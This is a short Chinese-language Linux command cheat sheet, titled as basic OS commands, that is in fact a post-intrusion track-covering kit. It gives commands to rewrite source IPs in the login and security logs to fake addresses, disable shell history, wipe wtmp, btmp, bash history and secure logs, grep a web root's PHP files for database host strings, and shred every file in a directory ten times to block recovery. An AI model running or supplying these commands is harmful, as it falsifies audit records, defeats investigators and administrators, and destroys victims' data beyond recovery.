操作系统基础命令

Linux

修改登陆成功日志IP

##替换8.8.8.8 为 1.1.1.1
utmpdump /var/log/wtmp |sed "s/171.12.17.39/94.124.79.114/g" |utmpdump -r >/tmp/wtmp1 &&\mv /tmp/wtmp1 /var/log/wtmp

替换安全日志IP地址

sed -i 's/171.12.17.39/94.124.79.14/g' /var/log/secure

不记录命令

unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0

暴力清理痕迹

echo > /var/log/wtmp
echo > /var/log/btmp
history -c
echo > ./.bash_history 
rm -rf  /var/log/secure*

查找文件内容

find  /www/wwwroot/xxxx/  -name '*.php' -exec grep -l "localhost" {} \; -exec grep -n  "localhost" {} \;  >1.txt
find ./ ! -name '*.log' -type f |xargs grep '搜索内容'

删除当前目录所有文件，并重写数据10次  防止恢复文件

chattr -i .user.ini
find . -depth -type f -exec shred -v -n 10 -z -u {} \;

Windows